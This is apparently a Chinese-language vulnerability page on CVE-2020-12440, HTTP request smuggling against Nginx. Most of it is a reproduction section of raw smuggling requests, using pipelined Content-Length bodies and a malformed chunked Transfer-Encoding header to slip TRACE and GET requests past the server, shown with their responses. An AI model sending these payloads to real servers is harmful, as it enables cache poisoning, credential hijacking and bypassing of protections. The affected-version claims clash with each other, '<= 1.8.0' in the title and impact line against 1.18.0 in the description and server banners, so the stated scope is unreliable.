# （CVE-2020-12440）Nginx <= 1.8.0 请求走私 == 一、漏洞简介 ------------ Nginx 1.18.0及之前版本中存在安全漏洞。攻击者可利用该漏洞进行缓存投毒，劫持凭证或绕过安全保护。 二、漏洞影响 ------------ Nginx \<= 1.8.0 三、复现过程 ------------  ### Request GET /test.html HTTP/1.1 Host: www.0-sec.org Content-Length: 2 GET /poc.html HTTP/1.1 Host: www.0-sec.org Content-Length: 15 ### Response HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 01 May 2020 18:28:44 GMT Content-Type: text/html Content-Length: 33 Last-Modified: Thu, 30 Apr 2020 14:36:32 GMT Connection: keep-alive ETag: "5eaae270-21" Accept-Ranges: bytes

Test Page!

HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Fri, 01 May 2020 18:28:44 GMT
Content-Type: text/html
Content-Length: 15
Last-Modified: Thu, 30 Apr 2020 14:35:41 GMT
Connection: keep-alive
ETag: “5eaae23d-f”
Accept-Ranges: bytes

NGINX PoC File

其他例子
——–

### Request（200 OK + 405 Method Not Allowed）

GET / HTTP/1.1
Host: www.0-sec.org
Content-Length: 4
Transfer-Encoding : chunked

46
TRACE / HTTP/1.1
Host:www.0-sec.org
Content-Length:15

kk
0s

### Response（200 OK + 405 Method Not Allowed）

HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:28:12 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Tue, 21 Apr 2020 16:08:59 GMT
Connection: keep-alive
ETag: “5e9f1a9b-264”
Accept-Ranges: bytes

Welcome to nginx!

If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.

For online documentation and support please refer to
nginx.org.
Commercial support is available at
nginx.com.

Thank you for using nginx.

HTTP/1.1 405 Not Allowed
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:28:12 GMT
Content-Type: text/html
Content-Length: 157
Connection: close

### Request（200 OK + 404 Not Found）

GET / HTTP/1.1
Host: www.0-sec.org
Content-Length: 4
Transfer-Encoding : chunked

46
GET /404 HTTP/1.1
Host:www.0-sec.org
Content-Length:15

kk
0s

### Response（200 OK + 404 Not Found）

HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:23:52 GMT
Content-Type: text/html
Content-Length: 612
Last-Modified: Tue, 21 Apr 2020 16:08:59 GMT
Connection: keep-alive
ETag: “5e9f1a9b-264”
Accept-Ranges: bytes

Welcome to nginx!

If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.

For online documentation and support please refer to
nginx.org.
Commercial support is available at
nginx.com.

Thank you for using nginx.

HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Tue, 21 Apr 2020 16:23:52 GMT
Content-Type: text/html
Content-Length: 153
Connection: keep-alive